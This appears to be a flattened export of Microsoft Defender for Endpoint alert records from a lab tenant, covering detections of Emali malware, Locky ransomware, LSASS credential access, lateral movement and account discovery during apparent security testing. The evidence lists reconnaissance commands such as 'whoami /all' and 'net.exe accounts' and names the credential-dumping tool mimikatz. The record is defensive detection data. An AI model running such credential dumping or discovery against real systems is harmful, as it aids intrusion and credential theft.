Discovery
New
Low
null
UnsupportedAlertType
null
null
WindowsDefenderAtp
9bfe28a9-21eb-4f8a-b51e-38ebd3650c88
null
null
null
[ "T1033", "T1087", "T1087.001" ]
[ { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "msdxv8-win10v.msdxv8.m365dpoc.com", "firstSeen": "2022-12-08T05:21:19.944Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "jeff", "domainName": "MSDXV8" } ], "mdatpDev...
[ { "aadUserId": null, "accountName": "jeff", "detectionStatus": null, "deviceId": null, "domainName": "MSDXV8", "entityType": "User", "evidenceCreationTime": "2022-12-22T08:51:01.6233333Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime":...
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
da638055758738779251_-105063541
c0af79a3-1afe-4ee1-b6b5-96fb0783b309
791
MicrosoftDefenderForEndpoint
2022-12-02T11:04:33.8779705Z
2022-12-02T11:13:16.6333333Z
2022-12-02T11:13:16.4746457Z
2022-12-02T11:02:57.2590858Z
2022-12-02T11:02:57.2590858Z
'Emali' malware was detected during a scheduled scan
Malware and unwanted software are undesirable applications that perform annoying, disruptive, or harmful actions on affected machines. Some of these undesirable applications can replicate and spread from one machine to another. Others are able to receive commands from remote attackers and perform activities associated with cyber attacks. This detection might indicate that the malware was stopped from delivering its payload. However, it is prudent to check the machine for signs of infection.
Malware
Resolved
Informational
54
SuccessfullyRemediated
null
null
WindowsDefenderAv
d60f5b90-ecd8-4d77-8186-a801597ec762
Automation
null
Emali
[]
[ { "aadDeviceId": "7711ee94-033f-495e-bc7a-53e7c1e57111", "defenderAvStatus": "NotSupported", "deviceDnsName": "msdxv2-win10a.msdxv2.m365dpoc.com", "firstSeen": "2022-09-19T08:40:31.865Z", "healthStatus": "Active", "loggedOnUsers": [], "mdatpDeviceId": "252919130a29cc07e305c5c4ef99e5435b9...
[ { "aadUserId": null, "accountName": null, "detectionStatus": "Detected", "deviceId": "252919130a29cc07e305c5c4ef99e5435b96b889", "domainName": null, "entityType": "File", "evidenceCreationTime": "2022-12-02T11:04:34.0833333Z", "fileName": "validatecloud.exe", "filePath": "C:\\M36...
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-18T05:12:07.6266667Z
Suspicious
None
bob
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1111
89b6fc86-af84-47b2-a72d-325362598b2c
ronhd@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-13T21:16:42.6266667Z
Suspicious
None
admin
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1110
598763ac-48bb-4671-9472-6be219756e33
darol@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-09-30T06:15:59.5333333Z
Suspicious
None
user1
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1107
0808dea1-2ec8-41d2-8e3e-7c18309fab09
steve@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-11-21T02:17:48.9433333Z
Suspicious
None
null
null
null
null
null
null
null
null
null
0
whoami /all
0001-01-01T00:00:00Z
0
0001-01-01T00:00:00Z
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-09-30T06:14:47.4866667Z
Benign
None
jeff
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-11-16T15:26:50.78Z
Suspicious
None
operator
NT AUTHORITY
S-1-5-18
null
null
069beb39e03b378493f1a2db5113c3ef62216a46
fddc5f29f779a6ef73d70a2c551397fdee63f549f2bce4fe6a7aeedc11f4f72e
net.exe
C:\Windows\System32
4,748
"net.exe" accounts
2022-11-16T10:05:18.6390263Z
912
2022-11-16T10:04:38.1400707Z
powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0
Detected
7114973b832b32d349815a5d2811738cc10fa650
da638072963850335652_-797112414
1f117fc9-2eac-4106-b532-d1fc1487bb59
975
MicrosoftDefenderForEndpoint
2022-12-22T08:59:45.0335888Z
2022-12-22T09:09:29.2566667Z
2022-12-22T09:09:29.0872242Z
2022-12-22T08:22:42.0859019Z
2022-12-22T08:48:15.2244011Z
File dropped and launched from remote location
A remote session dropped a file and executed it. An attacker or a malware might be an attempting move laterally or propagate.
LateralMovement
Resolved
Medium
63
Benign
null
null
WindowsDefenderAtp
17d50613-c135-4981-858e-86cdecb4e46e
Automation
null
null
[ "T1021.002", "T1105", "T1570" ]
[ { "aadDeviceId": null, "defenderAvStatus": "NotSupported", "deviceDnsName": "evilcorp.cn", "firstSeen": "2022-12-08T01:05:46.8493187Z", "healthStatus": "Active", "loggedOnUsers": [], "mdatpDeviceId": "3ad3fb0567038c2ec2e59e76690c2e6c01253af9", "onboardingStatus": "Onboarded", "os...
[ { "aadUserId": null, "accountName": "steve", "detectionStatus": null, "deviceId": null, "domainName": "MSDXV8", "entityType": "User", "evidenceCreationTime": "2022-12-22T08:59:45.07Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": nul...
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-18T04:50:03.6566667Z
Unknown
None
Takeshi
TMTOWER-BOOK
S-1-5-21-7316772-2057538409-3008203053-1001
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
da638072957045782340_-1455835127
3746883e-163e-42ac-8c88-1e641f70a0f0
975
MicrosoftDefenderForEndpoint
2022-12-22T08:48:24.5782511Z
2022-12-22T08:54:54.5066667Z
null
2022-12-22T08:47:23.4251196Z
2022-12-22T08:47:56.5126978Z
Suspicious access to LSASS service
In order to obtain clear-text password, attackers must decrypt the user's password from the LSASS service's memory. Multiple public tools as well as custom ones could be used to perform this operation. Once obtained, these credentials are often used in lateral movement activities to infiltrate other machines and servers in the network.
CredentialAccess
New
High
61
PendingApproval
null
null
WindowsDefenderAtp
34104b26-43b7-4890-a542-7e071c037d61
null
null
null
[ "T1003", "T1003.001", "T1550.002", "T1550.003" ]
[ { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "test.domain", "firstSeen": "2022-12-08T05:21:19.944Z", "healthStatus": "Inactive", "loggedOnUsers": [ { "accountName": "jeff", "domainName": "MSDXV8" } ], "mdatpDeviceId": "7ba8aa00868...
[ { "aadUserId": null, "accountName": "jeff", "detectionStatus": null, "deviceId": null, "domainName": "MSDXV8", "entityType": "User", "evidenceCreationTime": "2022-12-22T08:48:24.7566667Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime":...
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-11T08:20:15.65Z
Suspicious
None
hacker
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-11-21T02:04:26.0433333Z
Suspicious
None
jeff
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
70df765f554ed7392200422c18776b8992c09231
912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9
mimikatz.exe
C:\M365DAttack\Mimikatz\x64
8,844
ping 127.0.0.1
2022-11-21T02:02:27.0051694Z
11,068
2022-11-21T02:01:28.4753286Z
powershell.exe
\Device\HarddiskVolume4\Windows\System32\WindowsPowerShell\v1.0
Detected
c7e147cb0eb3534a4dcea5acb8e61c933713b145
da638037515792020663_-883827560
c06e282b-105e-41d6-a53b-ef66c941946e
686
MicrosoftDefenderForEndpoint
2022-11-11T08:19:39.2020931Z
2022-11-18T00:39:00.6933333Z
2022-11-12T01:35:42.84Z
2022-11-11T08:17:34.308141Z
2022-11-11T08:17:34.7790325Z
Suspicious remote activity
Suspicious activity initiated remotely was observed on this machine. This alert can flag attempts to initiate interactive sessions, modify files, pass WMI commands, create scheduled tasks, and other potentially malicious activities from a remote machine.
LateralMovement
Resolved
Medium
36
TerminatedBySystem
TruePositive
SecurityTesting
WindowsDefenderAtp
64e1767d-3cc3-4573-8707-d2892b79c155
takeshi@msdxv2.m365dpoc.com
null
null
[ "T1021", "T1105", "T1543.003", "T1569.002" ]
[ { "aadDeviceId": "14b11ffe-5128-4842-bbdf-31f0fbfcb600", "defenderAvStatus": "Updated", "deviceDnsName": "msdxv2-win10b.msdxv2.m365dpoc.com", "firstSeen": "2022-08-08T08:29:47.252Z", "healthStatus": "Active", "loggedOnUsers": [], "mdatpDeviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48...
[ { "aadUserId": "89b6fc86-af84-47b2-a72d-325362598b2c", "accountName": "ronhd", "detectionStatus": null, "deviceId": null, "domainName": "MSDXV2", "entityType": "User", "evidenceCreationTime": "2022-11-11T08:19:39.26Z", "fileName": null, "filePath": null, "ipAddress": null, ...
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-21T02:08:06.97Z
Malicious
None
jeff
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-11-16T15:26:50.78Z
Suspicious
None
SYSTEM
NT AUTHORITY
S-1-5-18
null
null
069beb39e03b378493f1a2db5113c3ef62216a46
fddc5f29f779a6ef73d70a2c551397fdee63f549f2bce4fe6a7aeedc11f4f72e
net.exe
C:\Windows\System32
4,748
whoami /all
2022-11-16T10:05:18.6390263Z
912
2022-11-16T10:04:38.1400707Z
powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0
Detected
7114973b832b32d349815a5d2811738cc10fa650
da638001152858281819_1687592675
e973a241-fc94-452b-8be3-00b023996ca6
486
MicrosoftDefenderForEndpoint
2022-09-30T06:14:45.8282007Z
2022-11-19T01:35:42.7033333Z
2022-10-01T01:36:00.5066667Z
2022-09-30T06:11:52.2694305Z
2022-09-30T06:13:05.4830293Z
Anomalous account lookups
An anomalous chain of attempts to look up user account information has been observed. An attacker might be gathering information about potential targets.
Discovery
Resolved
Low
null
UnsupportedAlertType
TruePositive
SecurityTesting
WindowsDefenderAtp
ad0494b0-6cfa-4ba2-9285-706fd414acd8
msftadmin@msdxv2.m365dpoc.com
null
null
[ "T1033", "T1069.001", "T1069.002", "T1087", "T1087.001", "T1087.002" ]
[ { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "msdxv2-win10v.msdxv2.m365dpoc.com", "firstSeen": "2022-08-08T08:51:02.455Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "jeff", "domainName": "MSDXV2" } ], "mdatpDev...
[ { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": null, "deviceId": null, "domainName": "msdxv2.m365dpoc", "entityType": "User", "evidenceCreationTime": "2022-09-30T06:14:45.93Z", "fileName": null, "filePath": null, "ipAddress": ...
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
da638065313868828202_-405283573
c4742454-8ded-4625-af63-13bcf57fce5d
794
MicrosoftDefenderForEndpoint
2022-12-13T12:29:46.8828457Z
2022-12-13T12:35:25.2966667Z
null
2022-12-13T12:18:09.0677744Z
2022-12-13T12:18:09.0677744Z
'Locky' ransomware was prevented
Ransomware use common methods to encrypt files using keys that are known only to attackers. As a result, victims are unable to access the contents of the encrypted files. Most ransomware display or drop a ransom note—an image or an HTML file that contains information about how to obtain the attacker-supplied decryption tool for a fee.   To target documents or other files that contain user data, some ransomware look for files in certain locations and files with certain extension names. It is also common for ransomware to rename encrypted files so that they all use the same extension name.  This detection might indicate that the malware was stopped from delivering its payload. However, it is prudent to check the machine for signs of infection.
Ransomware
New
Medium
58
PendingApproval
null
null
WindowsDefenderAv
51d03c45-b142-4de4-95df-01b0c259d8f6
null
null
Locky
[]
[ { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "corp.local", "firstSeen": "2022-12-13T12:00:53.459Z", "healthStatus": "Active", "loggedOnUsers": [], "mdatpDeviceId": "50ffd07170283e077006618b8afafeaecc185857", "onboardingStatus": "Onboarded", "osBuild": 19...
[ { "aadUserId": null, "accountName": null, "detectionStatus": "Prevented", "deviceId": "50ffd07170283e077006618b8afafeaecc185857", "domainName": null, "entityType": "File", "evidenceCreationTime": "2022-12-13T12:29:47.12Z", "fileName": "TestFile_Block_Office_applications_from_creating...
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-11-18T05:13:00.6633333Z
Suspicious
None
jeff
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
70df765f554ed7392200422c18776b8992c09231
912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9
mimikatz.exe
C:\M365DAttack\Mimikatz\x64
9,332
ping 127.0.0.1
2022-11-18T05:09:59.0460935Z
4,976
2022-11-18T05:04:12.7150402Z
powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0
Detected
c7e147cb0eb3534a4dcea5acb8e61c933713b145
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-13T16:08:25.23Z
Suspicious
None
darol
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1110
598763ac-48bb-4671-9472-6be219756e33
darol@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-21T02:05:47.11Z
Benign
None
jeff
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null